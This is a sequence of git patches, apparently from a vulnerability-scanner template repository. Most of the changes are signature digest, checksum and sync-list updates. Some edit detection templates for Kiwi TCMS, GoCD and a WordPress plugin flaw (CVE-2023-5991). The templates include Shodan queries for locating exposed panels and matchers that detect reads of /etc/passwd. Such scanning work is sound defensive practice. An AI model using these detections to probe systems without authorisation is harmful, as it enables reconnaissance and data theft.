a/http/misconfiguration/gocd/gocd-encryption-key.yaml b/http/misconfiguration/gocd/gocd-encryption-key.yaml index 93ae128e3e..928da55e05 100644 --- a/http/misconfiguration/gocd/gocd-encryption-key.yaml +++ b/http/misconfiguration/gocd/gocd-encryption-key.yaml @@ -38,4 +38,4 @@ http: - type: regex regex: - "([a-z0-9]){32}" -# digest: 490a0046304402205ac41f33e34d969b020ee864720a58cdc98c17066213906ca0a6703759bee6260220648ad5ffaa33adc1a318395cd2da424417fb64cf1ed962a0bb6da6cf73514c09:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100c33be8766bce2376dde66ff40c65f89225bdfa03a076007034b7174095a9912e022014b9097f6923389b114d20dbe98e44d2644c12971b4c29dc9800e6046b1a9373:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 09565244cc13da8249c7bf3f13967ead3a15194e Mon Sep 17 00:00:00 2001 From: Parth Malhotra <28601533+parthmalhotra@users.noreply.github.com> Date: Wed, 15 May 2024 02:59:51 +0300 Subject: [PATCH 1012/1768] Update kiwitcms-login.yaml --- http/exposed-panels/kiwitcms-login.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/http/exposed-panels/kiwitcms-login.yaml b/http/exposed-panels/kiwitcms-login.yaml index acc185fa66..6f1a03b92d 100644 --- a/http/exposed-panels/kiwitcms-login.yaml +++ b/http/exposed-panels/kiwitcms-login.yaml @@ -14,7 +14,7 @@ info: metadata: max-request: 1 product: kiwi_tcms - shodan-query: title:"Kiwi TCMS - Login",http.favicon.hash:-1909533337 + shodan-query: title:"Kiwi TCMS - Login" http.favicon.hash:-1909533337 vendor: kiwitcms tags: kiwitcms,panel @@ -33,4 +33,4 @@ http: group: 1 regex: - "Version ([0-9.]+)" -# digest: 4a0a0047304502204970f122554d53140cadb0128e08750a33a2fa84fc89d097f5af68e1bfb2eb16022100cd6eb7291e86d5379a54e26a5c5d3abcd4ff5c0f505858a409d2b4da17d521f7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502204970f122554d53140cadb0128e08750a33a2fa84fc89d097f5af68e1bfb2eb16022100cd6eb7291e86d5379a54e26a5c5d3abcd4ff5c0f505858a409d2b4da17d521f7:922c64590222798bb761d5b6d8e72950 From 21f3397ebf41c267ffc7c0dc9ecf15d03a377396 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 15 May 2024 00:00:27 +0000 Subject: [PATCH 1014/1768] Auto Generated Templates Checksum [Wed May 15 00:00:27 UTC 2024] :robot: --- templates-checksum.txt | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index ccd528e555..6c374011ea 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3981,7 +3981,7 @@ http/exposed-panels/kfm/kaes-file-manager.yaml:163a84373e69e74099b9f771341054ad2 http/exposed-panels/kfm/kfm-login-panel.yaml:d86163cf22c63d250566759202ef64092196705f http/exposed-panels/kibana-panel.yaml:ab4bffa526cbad54f4b8abf2bc46f5ddc1e4a284 http/exposed-panels/kiteworks-pcn-panel.yaml:8eb88c7a52943afd620e5f92e0f12ea4b2fdef16 -http/exposed-panels/kiwitcms-login.yaml:4f2a08cf85319ee93b172cf3e09da11eaa08d097 +http/exposed-panels/kiwitcms-login.yaml:12c42952a2be760b44850a50bf8f8e571a20d610 http/exposed-panels/kkfileview-panel.yaml:c42a91ee90824170f94bcaaf4a396e33f8d1420b http/exposed-panels/klr300n-panel.yaml:3e7feed65269887a82bdab5a4971d4748236fdcd http/exposed-panels/kodak-network-panel.yaml:ff5ef39f196e3dcec90c1df4f05cee3b70ffa854 @@ -5333,8 +5333,8 @@ http/misconfiguration/gitlist-disclosure.yaml:8111ac3c10bc09b42d9c2bc565cd5758cb http/misconfiguration/global-traffic-statistics.yaml:f5ab7750ae4d32d8b857b8290bcd98ac1358fa0d http/misconfiguration/glpi-directory-listing.yaml:29bb88890e78f83428d00799224679dfd993e1bc http/misconfiguration/gocd/gocd-cruise-configuration.yaml:36a522bd05c12da13079058f75e0d272007728a5 -http/misconfiguration/gocd/gocd-encryption-key.yaml:b5515851c8e9d9819cbf17b6d7eb42437a00ebc6 -http/misconfiguration/gocd/gocd-unauth-dashboard.yaml:5511df1524242c7128bd033238a4dae5db3fb86a +http/misconfiguration/gocd/gocd-encryption-key.yaml:be6a8821d31748cd4dd513aa480f85039b05f505 +http/misconfiguration/gocd/gocd-unauth-dashboard.yaml:c147aedb86f9e6b5fba3dcecee97560c2fc935ad http/misconfiguration/google/insecure-firebase-database.yaml:9b13af3f5222a4143b0d4075bd1eeb391709de4f http/misconfiguration/gopher-server.yaml:049ecafed940f9efdec3f7ea458fb6f516e22238 http/misconfiguration/grafana-public-signup.yaml:0ca43758c6cefb8473b88d8799dc8083bbdb4b09 @@ -8526,7 +8526,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:fde380a18fd424d1fb883d41dda45c0b95784e5c +templates-checksum.txt:1a90b7583a5d6ac8cd49a5788f3fbb4f624f292c wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 27baf16c925503b4c4aeb6486b69fc08ac1173f2 Mon Sep 17 00:00:00 2001 From: Parth Malhotra <28601533+parthmalhotra@users.noreply.github.com> Date: Wed, 15 May 2024 03:00:50 +0300 Subject: [PATCH 1015/1768] Update kiwitcms-json-rpc.yaml --- http/vulnerabilities/other/kiwitcms-json-rpc.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/http/vulnerabilities/other/kiwitcms-json-rpc.yaml b/http/vulnerabilities/other/kiwitcms-json-rpc.yaml index d68f6b0308..6c86c20395 100644 --- a/http/vulnerabilities/other/kiwitcms-json-rpc.yaml +++ b/http/vulnerabilities/other/kiwitcms-json-rpc.yaml @@ -11,7 +11,7 @@ info: - https://github.com/act1on3/nuclei-templates/blob/master/vulnerabilities/kiwi-information-disclosure.yaml metadata: max-request: 1 - shodan-query: title:"Kiwi TCMS - Login",http.favicon.hash:-1909533337 + shodan-query: title:"Kiwi TCMS - Login" http.favicon.hash:-1909533337 tags: kiwitcms,exposure,misconfig,hackerone http: @@ -44,4 +44,4 @@ http: part: body json: - .result[].username -# digest: 490a0046304402206498b9c98e30e36688f5ed44b4b119d5dd1ccf445adb66e57f7430c853526cd2022017c30c42721f5093f153a99b3600c36db25acd2c54a4141e2e0922f0da109afa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402206498b9c98e30e36688f5ed44b4b119d5dd1ccf445adb66e57f7430c853526cd2022017c30c42721f5093f153a99b3600c36db25acd2c54a4141e2e0922f0da109afa:922c64590222798bb761d5b6d8e72950 From 7ee8f470002e842aadc57ff742a1e53e3b426b8b Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 15 May 2024 00:01:32 +0000 Subject: [PATCH 1017/1768] Auto Generated Templates Checksum [Wed May 15 00:01:32 UTC 2024] :robot: --- templates-checksum.txt | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 6c374011ea..4a813a9a94 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -7756,7 +7756,7 @@ http/vulnerabilities/other/kingdee-eas-directory-traversal.yaml:2d4acac5bff94a82 http/vulnerabilities/other/kingdee-erp-rce.yaml:cdbd8bc5ade00ea67e803b32e5ce9b9ee954cab6 http/vulnerabilities/other/kingsoft-v8-file-read.yaml:f1424aa109595b203a05d0c6b3b181ee3faf709e http/vulnerabilities/other/kingsoft-vgm-lfi.yaml:920908a692b3c70d355b35dc730c20153f2f10c2 -http/vulnerabilities/other/kiwitcms-json-rpc.yaml:e8b89bed712fc69f4294693e5af6f7a35fc3c2d0 +http/vulnerabilities/other/kiwitcms-json-rpc.yaml:2f05c95ba761238790587d999ea131af5c9c0333 http/vulnerabilities/other/kodak-network-lfi.yaml:757f58aaa5d6318a5e343fee5fe250600bf82174 http/vulnerabilities/other/kyocera-m2035dn-lfi.yaml:ca4f7ab98104202417a24bfe05ccce4d9d63d18e http/vulnerabilities/other/landray-oa-datajson-rce.yaml:c62e0ed298fd046d8b4b307bbab0f990535dac24 @@ -8526,7 +8526,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:1a90b7583a5d6ac8cd49a5788f3fbb4f624f292c +templates-checksum.txt:45807b999fa7226e798407d410ef0cfdc28ecf6f wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 30ca90a78887a79d86badbc6bd559a8067a7ab49 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 15 May 2024 00:02:13 +0000 Subject: [PATCH 1018/1768] Auto Template Signing [Wed May 15 00:02:13 UTC 2024] :robot: --- http/cves/2021/CVE-2021-43287.yaml | 2 +- http/exposed-panels/kiwitcms-login.yaml | 2 +- http/misconfiguration/gocd/gocd-cruise-configuration.yaml | 2 +- http/misconfiguration/gocd/gocd-unauth-dashboard.yaml | 2 +- 4 files changed, 4 insertions(+), 4 deletions(-) diff --git a/http/cves/2021/CVE-2021-43287.yaml b/http/cves/2021/CVE-2021-43287.yaml index e8a9f41d78..57168e57b4 100644 --- a/http/cves/2021/CVE-2021-43287.yaml +++ b/http/cves/2021/CVE-2021-43287.yaml @@ -43,4 +43,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402204609e2e1895643baf7cdc7ad60281688e3476109ccc5ce2ccb2cf0270ebfbfc5022019685f6fa856fe84479cc12e3f1f631a79582a35c1f30fb624a042c867cad5c7:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100d0200eeb5397b87ed805111ba73b1f44e9e642500d7a6b71f5b6a960dc8d1549022050d924940eadf44a9064cfa5bcaa5f15133215a9364c377111696b5ac33dd637:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/kiwitcms-login.yaml b/http/exposed-panels/kiwitcms-login.yaml index 6f1a03b92d..eb09c731fe 100644 --- a/http/exposed-panels/kiwitcms-login.yaml +++ b/http/exposed-panels/kiwitcms-login.yaml @@ -33,4 +33,4 @@ http: group: 1 regex: - "Version ([0-9.]+)" -# digest: 4a0a0047304502204970f122554d53140cadb0128e08750a33a2fa84fc89d097f5af68e1bfb2eb16022100cd6eb7291e86d5379a54e26a5c5d3abcd4ff5c0f505858a409d2b4da17d521f7:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100c7e0445fb0c4273073704f89e15d3964d3730fa6c57a6d21ae98ba39406c076102210096a4c3868ade5124d38d7a8312bcbd096227b224884baaef2d97163e6b82c9f0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/gocd/gocd-cruise-configuration.yaml b/http/misconfiguration/gocd/gocd-cruise-configuration.yaml index cf581b6731..d86c079492 100644 --- a/http/misconfiguration/gocd/gocd-cruise-configuration.yaml +++ b/http/misconfiguration/gocd/gocd-cruise-configuration.yaml @@ -31,4 +31,4 @@ http: - "webhookSecret" - "tokenGenerationKey" condition: and -# digest: 4a0a0047304502200d2fd1e9ecc4854d8aa9b0188c42e1c8a4dab6cf811a1c1b0ddefca324d1de1c02210084d971bcf96b13508ede2ea3a0c92d437bdfc34c2d22d5ea4437328690cec9e1:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100ac29afb87fd8ac872a0f7b942535bb3bf817074b934908847e337261e4192e3b022032bf9074f738ea01957b605f5c88f68efad27b85ab8d69ecb23fc5d0b0f73193:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/gocd/gocd-unauth-dashboard.yaml b/http/misconfiguration/gocd/gocd-unauth-dashboard.yaml index 7bf379bbc8..3759aa334e 100644 --- a/http/misconfiguration/gocd/gocd-unauth-dashboard.yaml +++ b/http/misconfiguration/gocd/gocd-unauth-dashboard.yaml @@ -29,4 +29,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022039ea9bdb750a12ccc3a1ed4f126dc46e57f112649d35b2ed182a654a048ea4ad022100d4c117105dea72d50f8721c3c173dc0dd54cac8ffa896fd7f2ef5b4525f1f90a:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502205138b757ccc0742d887b97717a06383dd5ccfe5f0394ff3c193c4be652028887022100b791a416ff7c1da55813e25fbaed8b33cc7cc08e1d599a7a1bd42f10131ffacc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 1fc431851837770bd917879e4812a100c1b5e374 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Wed, 15 May 2024 09:15:59 +0530 Subject: [PATCH 1019/1768] added header matcher --- http/cves/2023/CVE-2023-5991.yaml | 9 ++++++++- 1 file changed, 8 insertions(+), 1 deletion(-) diff --git a/http/cves/2023/CVE-2023-5991.yaml b/http/cves/2023/CVE-2023-5991.yaml index 1f67bfe17d..19a6788590 100644 --- a/http/cves/2023/CVE-2023-5991.yaml +++ b/http/cves/2023/CVE-2023-5991.yaml @@ -8,8 +8,8 @@ info: The Hotel Booking Lite WordPress plugin before 4.8.5 does not validate file paths provided via user input, as well as does not have proper CSRF and authorisation checks, allowing unauthenticated users to download and delete arbitrary files on the server remediation: Fixed in 4.8.5 reference: - - https://nvd.nist.gov/vuln/detail/CVE-2023-5991 - https://wpscan.com/vulnerability/e9d35e36-1e60-4483-b8b3-5cbf08fcd49e/ + - https://nvd.nist.gov/vuln/detail/CVE-2023-5991 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 @@ -39,6 +39,13 @@ http: regex: - "root:.*:0:0:" + - type: word + part: header + words: + - "filename=" + - "/etc/passwd" + condition: and + - type: status status: - 200 From 23b7c6b2624a66fdf30a69d1ba2a2745272476ef Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Wed, 15 May 2024 09:19:56 +0530 Subject: [PATCH 1020/1768] fix FN matchers --- http/exposed-panels/tiny-rss-panel.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/exposed-panels/tiny-rss-panel.yaml b/http/exposed-panels/tiny-rss-panel.yaml index 460457f73e..456deebdd8 100644 --- a/http/exposed-panels/tiny-rss-panel.yaml +++ b/http/exposed-panels/tiny-rss-panel.yaml @@ -23,5 +23,5 @@ http: - type: dsl dsl: - 'status_code==200' - - 'contains_all(body, "Tiny Tiny RSS", "ttrss_login", "ttrss_utility")' + - 'contains_any(body, "Tiny Tiny RSS", "ttrss_login", "ttrss_utility")' condition: and From 2e068670ecd6000fb3a39f61c7c0777f517cf082 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Wed, 15 May 2024 03:51:21 +0000 Subject: [PATCH 1021/1768] Auto Generated New Template Addition List [Wed May 15 03:51:21 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index fc4f5ccf95..4f685204f5 100644 --- a/.new-additions +++ b/.new-additions @@ -2,6 +2,7 @@ http/cnvd/2017/CNVD-2017-06001.yaml http/cves/2023/CVE-2023-36347.yaml http/cves/2023/CVE-2023-43374.yaml http/cves/2023/CVE-2023-45855.yaml +http/cves/2023/CVE-2023-5991.yaml http/cves/2024/CVE-2024-0200.yaml http/default-logins/softether/softether-vpn-default-login.yaml http/exposed-panels/ackee-panel.yaml From 6a01626553117949c0ccf86b7354f55793fe4a52 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 15 May 2024 03:51:27 +0000 Subject: [PATCH 1022/1768] Auto Generated Templates Checksum [Wed May 15 03:51:27 UTC 2024] :robot: --- templates-checksum.txt | 11 ++++++----- 1 file changed, 6 insertions(+), 5 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 4a813a9a94..8896da7b8b 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -2349,7 +2349,7 @@ http/cves/2021/CVE-2021-42663.yaml:f3023c6a997a0d8027972baaaf23a96c5c8e884b http/cves/2021/CVE-2021-42667.yaml:c19169cb40060f91bb99ef5323b157fa0fbf6297 http/cves/2021/CVE-2021-42887.yaml:dfe8d47da07a7c37b5294acdd283c4c27dbdf753 http/cves/2021/CVE-2021-43062.yaml:a2a6ba5ec2ce275fa2ffbb6b19af1b20dfc0a0c3 -http/cves/2021/CVE-2021-43287.yaml:86d4216d1418d3ee400ea98a2aa9ff407d4c7db0 +http/cves/2021/CVE-2021-43287.yaml:924e0ab303bf4959fb489490c4a5592747b44abe http/cves/2021/CVE-2021-43421.yaml:d3b512996e80ab08eaec03df406c88aa78376ac9 http/cves/2021/CVE-2021-43495.yaml:7976f205a306ddb65f565049e3f4451bd9a5ce92 http/cves/2021/CVE-2021-43496.yaml:1241385fad2c3dee60c598304d8dc5b177d94c32 @@ -3207,6 +3207,7 @@ http/cves/2023/CVE-2023-5375.yaml:1a1f06afcd795e901f9320cb7eafed3583078598 http/cves/2023/CVE-2023-5556.yaml:39a19e3bf6a7d46ee8f9d2550dfe7ed8f3ba2413 http/cves/2023/CVE-2023-5830.yaml:7e762d6ffa5d98900695ddf94f70b095cd54ee62 http/cves/2023/CVE-2023-5914.yaml:e569de3f31b3f9b4affbeac019dc42e7e4b6a0a3 +http/cves/2023/CVE-2023-5991.yaml:871deadbd3965017d7c7b89260f1aa42dd1b916c http/cves/2023/CVE-2023-6018.yaml:eb0a236252c640180f594627bfb873c35a398fd6 http/cves/2023/CVE-2023-6020.yaml:bb2f91071bd7ca0a284f7a15d68288e499f1f427 http/cves/2023/CVE-2023-6021.yaml:600bdb52150fc4bfebfd9c76945beb2ab94e7600 @@ -3981,7 +3982,7 @@ http/exposed-panels/kfm/kaes-file-manager.yaml:163a84373e69e74099b9f771341054ad2 http/exposed-panels/kfm/kfm-login-panel.yaml:d86163cf22c63d250566759202ef64092196705f http/exposed-panels/kibana-panel.yaml:ab4bffa526cbad54f4b8abf2bc46f5ddc1e4a284 http/exposed-panels/kiteworks-pcn-panel.yaml:8eb88c7a52943afd620e5f92e0f12ea4b2fdef16 -http/exposed-panels/kiwitcms-login.yaml:12c42952a2be760b44850a50bf8f8e571a20d610 +http/exposed-panels/kiwitcms-login.yaml:e64ae1148fd5fab74c8ea15391bca33551139c2a http/exposed-panels/kkfileview-panel.yaml:c42a91ee90824170f94bcaaf4a396e33f8d1420b http/exposed-panels/klr300n-panel.yaml:3e7feed65269887a82bdab5a4971d4748236fdcd http/exposed-panels/kodak-network-panel.yaml:ff5ef39f196e3dcec90c1df4f05cee3b70ffa854 @@ -5332,9 +5333,9 @@ http/misconfiguration/gitlab/gitlab-user-enum.yaml:09ffd851b3108524029e04ca4f1a5 http/misconfiguration/gitlist-disclosure.yaml:8111ac3c10bc09b42d9c2bc565cd5758cb6a220e http/misconfiguration/global-traffic-statistics.yaml:f5ab7750ae4d32d8b857b8290bcd98ac1358fa0d http/misconfiguration/glpi-directory-listing.yaml:29bb88890e78f83428d00799224679dfd993e1bc -http/misconfiguration/gocd/gocd-cruise-configuration.yaml:36a522bd05c12da13079058f75e0d272007728a5 +http/misconfiguration/gocd/gocd-cruise-configuration.yaml:afd6d002fdf184b81dc31d6774f5cf44c9949dba http/misconfiguration/gocd/gocd-encryption-key.yaml:be6a8821d31748cd4dd513aa480f85039b05f505 -http/misconfiguration/gocd/gocd-unauth-dashboard.yaml:c147aedb86f9e6b5fba3dcecee97560c2fc935ad +http/misconfiguration/gocd/gocd-unauth-dashboard.yaml:21d7318675025f7ca3566b9eb3c054fc7da276a4 http/misconfiguration/google/insecure-firebase-database.yaml:9b13af3f5222a4143b0d4075bd1eeb391709de4f http/misconfiguration/gopher-server.yaml:049ecafed940f9efdec3f7ea458fb6f516e22238 http/misconfiguration/grafana-public-signup.yaml:0ca43758c6cefb8473b88d8799dc8083bbdb4b09 @@ -8526,7 +8527,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:45807b999fa7226e798407d410ef0cfdc28ecf6f +templates-checksum.txt:59d48d7b53ac4588e8751e9beee90475b1e6e9d3 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From d858e4780e7ac8a6e5c2ad3e24383151e04ccbb1 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Wed, 15 May 2024 03:52:02 +0000 Subject: [PATCH 1023/1768] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index b5b40de222..5e03e4d4dc 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -7,6 +7,7 @@ on: - 'http/cves/2023/CVE-2023-36347.yaml' - 'http/cves/2023/CVE-2023-43374.yaml' - 'http/cves/2023/CVE-2023-45855.yaml' + - 'http/cves/2023/CVE-2023-5991.yaml' - 'http/cves/2024/CVE-2024-0200.yaml' - 'http/default-logins/softether/softether-vpn-default-login.yaml' - 'http/exposed-panels/ackee-panel.yaml' From 998b57391ee5e139144d0381411231ad82f44f66 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 15 May 2024 03:53:18 +0000 Subject: [PATCH 1024/1768] Auto Template Signing [Wed May 15 03:53:18 UTC 2024] :robot: --- http/cves/2023/CVE-2023-5991.yaml | 1 + http/vulnerabilities/other/kiwitcms-json-rpc.yaml | 2 +- 2 files changed, 2 insertions(+), 1 deletion(-) diff --git a/http/cves/2023/CVE-2023-5991.yaml b/http/cves/2023/CVE-2023-5991.yaml index 19a6788590..da1a165a5d 100644 --- a/http/cves/2023/CVE-2023-5991.yaml +++ b/http/cves/2023/CVE-2023-5991.yaml @@ -49,3 +49,4 @@ http: - type: status status: - 200 +# digest: 490a004630440220014d0afbf313c77eebbf17a87a636bfffda4e29359e40ad4ca50e421977f9c0f022049fddedfdc464a6562d4ed201b1cac4fb18011eeb933ff7d55619d9325b667ff:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/vulnerabilities/other/kiwitcms-json-rpc.yaml b/http/vulnerabilities/other/kiwitcms-json-rpc.yaml index 6c86c20395..9b5eab301c 100644 --- a/http/vulnerabilities/other/kiwitcms-json-rpc.yaml +++ b/http/vulnerabilities/other/kiwitcms-json-rpc.yaml @@ -44,4 +44,4 @@ http: part: body json: - .result[].username -# digest: 490a0046304402206498b9c98e30e36688f5ed44b4b119d5dd1ccf445adb66e57f7430c853526cd2022017c30c42721f5093f153a99b3600c36db25acd2c54a4141e2e0922f0da109afa:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100e625a29f9198b07723d4e26329a8d2d947c7240aadf04e2859b0f6dff1acdead02200b19f7aac7e79222c4418add2934c0704dab1ee621e7b45540127028968ed156:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 028eb90871a6c2ca156df33f4b13f56faa4079f0 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Wed, 15 May 2024 03:54:54 +0000 Subject: [PATCH 1025/1768] Auto Generated New Template Addition List [Wed May 15 03:54:54 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 4f685204f5..25ef20c856 100644 --- a/.new-additions +++ b/.new-additions @@ -4,6 +4,7 @@ http/cves/2023/CVE-2023-43374.yaml http/cves/2023/CVE-2023-45855.yaml http/cves/2023/CVE-2023-5991.yaml http/cves/2024/CVE-2024-0200.yaml +http/cves/2024/CVE-2024-3097.yaml http/default-logins/softether/softether-vpn-default-login.yaml http/exposed-panels/ackee-panel.yaml http/exposed-panels/craftercms-panel.yaml From e57d0f14ae99396a9225d6ee0987caadbcfd93af Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 15 May 2024 03:54:59 +0000 Subject: [PATCH 1026/1768] Auto Generated Templates Checksum [Wed May 15 03:54:59 UTC 2024] :robot: --- templates-checksum.txt | 7 ++++--- 1 file changed, 4 insertions(+), 3 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 8896da7b8b..1b944102f5 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3207,7 +3207,7 @@ http/cves/2023/CVE-2023-5375.yaml:1a1f06afcd795e901f9320cb7eafed3583078598 http/cves/2023/CVE-2023-5556.yaml:39a19e3bf6a7d46ee8f9d2550dfe7ed8f3ba2413 http/cves/2023/CVE-2023-5830.yaml:7e762d6ffa5d98900695ddf94f70b095cd54ee62 http/cves/2023/CVE-2023-5914.yaml:e569de3f31b3f9b4affbeac019dc42e7e4b6a0a3 -http/cves/2023/CVE-2023-5991.yaml:871deadbd3965017d7c7b89260f1aa42dd1b916c +http/cves/2023/CVE-2023-5991.yaml:2760a58a352d55a71ad7a177100f0513a82ed6c3 http/cves/2023/CVE-2023-6018.yaml:eb0a236252c640180f594627bfb873c35a398fd6 http/cves/2023/CVE-2023-6020.yaml:bb2f91071bd7ca0a284f7a15d68288e499f1f427 http/cves/2023/CVE-2023-6021.yaml:600bdb52150fc4bfebfd9c76945beb2ab94e7600 @@ -3278,6 +3278,7 @@ http/cves/2024/CVE-2024-2876.yaml:33b7f45b1e5e63e6936315618a667d8cd07d054b http/cves/2024/CVE-2024-2879.yaml:b49dbdd0903b4812334dfdb5d99c2c128b750841 http/cves/2024/CVE-2024-29059.yaml:e58644b7fabb2b313e0232a6d9eaffbebb7f498a http/cves/2024/CVE-2024-29269.yaml:c36e5f4c5cebb6a3a60a4c5228dd5a823482e8cc +http/cves/2024/CVE-2024-3097.yaml:774f7a0efb9b68a93dfda3f53418fcb4f23af138 http/cves/2024/CVE-2024-3136.yaml:5fed158063381326ca7336af0dc0c43ed317883d http/cves/2024/CVE-2024-31621.yaml:d0336b01545c56f67a5ee9a174f52e660861e3bc http/cves/2024/CVE-2024-31848.yaml:0d6172ae416d3a1de4e4cabcccdb4e102f2ca440 @@ -7757,7 +7758,7 @@ http/vulnerabilities/other/kingdee-eas-directory-traversal.yaml:2d4acac5bff94a82 http/vulnerabilities/other/kingdee-erp-rce.yaml:cdbd8bc5ade00ea67e803b32e5ce9b9ee954cab6 http/vulnerabilities/other/kingsoft-v8-file-read.yaml:f1424aa109595b203a05d0c6b3b181ee3faf709e http/vulnerabilities/other/kingsoft-vgm-lfi.yaml:920908a692b3c70d355b35dc730c20153f2f10c2 -http/vulnerabilities/other/kiwitcms-json-rpc.yaml:2f05c95ba761238790587d999ea131af5c9c0333 +http/vulnerabilities/other/kiwitcms-json-rpc.yaml:ce6d41bfb15c8218ccb1a6102888c78db08e4224 http/vulnerabilities/other/kodak-network-lfi.yaml:757f58aaa5d6318a5e343fee5fe250600bf82174 http/vulnerabilities/other/kyocera-m2035dn-lfi.yaml:ca4f7ab98104202417a24bfe05ccce4d9d63d18e http/vulnerabilities/other/landray-oa-datajson-rce.yaml:c62e0ed298fd046d8b4b307bbab0f990535dac24 @@ -8527,7 +8528,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:59d48d7b53ac4588e8751e9beee90475b1e6e9d3 +templates-checksum.txt:1b50b4125ef938d3ca75976b6462aab4643af44b wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 130ab0e0e271a17d58ec498329b817b9094f2f35 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Wed, 15 May 2024 03:55:34 +0000 Subject: [PATCH 1027/1768] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 5e03e4d4dc..ea22d0de4b 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml 